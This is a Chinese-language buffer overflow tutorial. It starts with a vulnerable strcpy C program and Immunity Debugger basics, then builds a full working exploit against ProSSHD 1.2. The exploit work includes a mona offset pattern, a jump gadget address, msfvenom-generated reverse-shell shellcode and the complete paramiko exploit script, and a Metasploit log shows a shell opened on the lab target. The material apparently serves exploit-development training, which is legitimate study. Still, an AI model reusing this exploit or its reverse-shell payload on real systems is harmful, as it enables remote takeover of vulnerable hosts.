编译运行 源代码:
#include <stdio.h>
greeting(char *temp1, char *temp2){
char name[400];
strcpy(name, temp2);
printf("Hello %s %s\n", temp1, temp2);
}
main(int argc, char *argv[]){
greeting(argv[1], argv[2]);
printf("Bye %s %s\n", argv[1], argv[2]);
}使用Immunity Debugger 调试程序:
F2设置断点,F9执行,F7单步执行,F8单步执行并跨过函数调用
X86 中有八个通用寄存器:
EAX累加器寄存器,EBX基础寄存器,ECX计数寄存器,EDX数据寄存器,ESI源寄存器,EDI目的寄存器,EBP基本指针,ESP堆栈指针,EIP指令指针。
alt+M 查看内存映射,包括堆、栈、DLL和可执行文件:
alt+e 可执行模块列表:
修改代码方便调试,上面代码使用python 命令行传参参数调试简单,但是不是很方便。
#include <stdio.h>
greeting(char *temp1, char *temp2){
char name[10];
strcpy(name, temp2);
printf("Hello %s %s\n", temp1, temp2);
}
main(int argc, char *argv[]){
greeting(argv[1], argv[2]);
printf("Bye %s %s\n", argv[1], argv[2]);
}Immunity debugger调试:
笨方试数溢出,参数不能多也不能太多也不能少
传入参数 程序崩溃
alt + e 双击调试程序
F9执行 -> F8跨过函数调用
继续执行程序崩溃。程序没有异常的处理,交给系统处理。
————————————————————————————————————————————————————————
编写漏洞攻击程序:
控制EIP、确定偏移、确定攻击向量、构建漏洞攻击、测试漏洞攻击、调试漏洞攻击程序。
prosshd1.2漏洞测试:
在windows中创建一个测试用户,添加用户启动服务看是否能连接主机:
ssh -p 22 [email protected]
The authenticity of host '192.168.1.102 (192.168.1.102)' can't be established.
RSA key fingerprint is SHA256:JPOlsgfYZhAizWUj7xFiiMldKlJWw0utnRt27m5ty8g.
Are you sure you want to continue connecting (yes/no)? ye
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.102' (RSA) to the list of known hosts.
[email protected]'s password:
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Users\Public\Program Files\Lab-NC\ProSSHD>exit
Connection to 192.168.1.102 closed.
python溢出代码:
#!/usr/bin/python
import paramiko
from scpclient import *
from contextlib import closing
from time import sleep
import struct
hostname = "192.168.1.102"
username = "test"
password = "123456"
req = "A" * 502 #有可能是501或者更大 需要尝试
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username,key_filename=None, password=password)
sleep(15)
with closing(Read(ssh_client.get_transport(), req)) as scp:
scp.receive("foo.txt")启动python程序,在windows中快速打开Immunity 添加wsshd.exe进程
F9执行,最后程序崩溃看到EIP控制权
确定偏移 mona 插件 : https://github.com/corelan/mona
底部输入命令 打开日志窗口
回到CPU主页面 底部输入命令 生成502字节模板,
修改python程序:
req = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6A"运行程序,在调试器中调试结果:
使用mona计算EIP偏移:
windows系统栈位于低地址中,为了避开0x00等空字节,需要在调试程序或DLL中搜索该操作码。
该模块 并不受漏洞攻击反制操作保护,也不参与ASLR,在其中找到操作码。
会在D:\tools\monalogs\wsshd目录下看到jmp.txt 打开查看
0x7c345c30 : push esp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll)
测试shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.105 LPORT=4444 -b "\x00" -f python -v shellcodeimport paramiko
from scpclient import *
from contextlib import closing
from time import sleep
import struct
hostname = "192.168.1.102"
username = "test"
password = "123456"
jmp = struct.pack('<L', 0x7c345c30)
pad = "\x90" * 12
shellcode = ""
shellcode += "\xdd\xc0\xd9\x74\x24\xf4\xbf\xad\xab\x85\x73\x5b"
shellcode += "\x33\xc9\xb1\x52\x31\x7b\x17\x03\x7b\x17\x83\x46"
shellcode += "\x57\x67\x86\x64\x40\xea\x69\x94\x91\x8b\xe0\x71"
shellcode += "\xa0\x8b\x97\xf2\x93\x3b\xd3\x56\x18\xb7\xb1\x42"
shellcode += "\xab\xb5\x1d\x65\x1c\x73\x78\x48\x9d\x28\xb8\xcb"
shellcode += "\x1d\x33\xed\x2b\x1f\xfc\xe0\x2a\x58\xe1\x09\x7e"
shellcode += "\x31\x6d\xbf\x6e\x36\x3b\x7c\x05\x04\xad\x04\xfa"
shellcode += "\xdd\xcc\x25\xad\x56\x97\xe5\x4c\xba\xa3\xaf\x56"
shellcode += "\xdf\x8e\x66\xed\x2b\x64\x79\x27\x62\x85\xd6\x06"
shellcode += "\x4a\x74\x26\x4f\x6d\x67\x5d\xb9\x8d\x1a\x66\x7e"
shellcode += "\xef\xc0\xe3\x64\x57\x82\x54\x40\x69\x47\x02\x03"
shellcode += "\x65\x2c\x40\x4b\x6a\xb3\x85\xe0\x96\x38\x28\x26"
shellcode += "\x1f\x7a\x0f\xe2\x7b\xd8\x2e\xb3\x21\x8f\x4f\xa3"
shellcode += "\x89\x70\xea\xa8\x24\x64\x87\xf3\x20\x49\xaa\x0b"
shellcode += "\xb1\xc5\xbd\x78\x83\x4a\x16\x16\xaf\x03\xb0\xe1"
shellcode += "\xd0\x39\x04\x7d\x2f\xc2\x75\x54\xf4\x96\x25\xce"
shellcode += "\xdd\x96\xad\x0e\xe1\x42\x61\x5e\x4d\x3d\xc2\x0e"
shellcode += "\x2d\xed\xaa\x44\xa2\xd2\xcb\x67\x68\x7b\x61\x92"
shellcode += "\xfb\x44\xde\x9d\x92\x2c\x1d\x9d\x75\xf1\xa8\x7b"
shellcode += "\x1f\x19\xfd\xd4\x88\x80\xa4\xae\x29\x4c\x73\xcb"
shellcode += "\x6a\xc6\x70\x2c\x24\x2f\xfc\x3e\xd1\xdf\x4b\x1c"
shellcode += "\x74\xdf\x61\x08\x1a\x72\xee\xc8\x55\x6f\xb9\x9f"
shellcode += "\x32\x41\xb0\x75\xaf\xf8\x6a\x6b\x32\x9c\x55\x2f"
shellcode += "\xe9\x5d\x5b\xae\x7c\xd9\x7f\xa0\xb8\xe2\x3b\x94"
shellcode += "\x14\xb5\x95\x42\xd3\x6f\x54\x3c\x8d\xdc\x3e\xa8"
shellcode += "\x48\x2f\x81\xae\x54\x7a\x77\x4e\xe4\xd3\xce\x71"
shellcode += "\xc9\xb3\xc6\x0a\x37\x24\x28\xc1\xf3\x54\x63\x4b"
shellcode += "\x55\xfd\x2a\x1e\xe7\x60\xcd\xf5\x24\x9d\x4e\xff"
shellcode += "\xd4\x5a\x4e\x8a\xd1\x27\xc8\x67\xa8\x38\xbd\x87"
shellcode += "\x1f\x38\x94"
req = "A" * 489 + jmp + pad + shellcode
ssh_client = paramiko.SSHClient()
ssh_client.load_system_host_keys()
ssh_client.connect(hostname, username=username,key_filename=None, password=password)
sleep(15)
with closing(Read(ssh_client.get_transport(), req)) as scp:
scp.receive("foo.txt")成功:
msf exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.105:4444
[*] Command shell session 1 opened (192.168.1.105:4444 -> 192.168.1.102:49282) at 2018-09-13 16:17:27 +0800
C:\Users\Public\Program Files\Lab-NC\ProSSHD>
________________________________________________________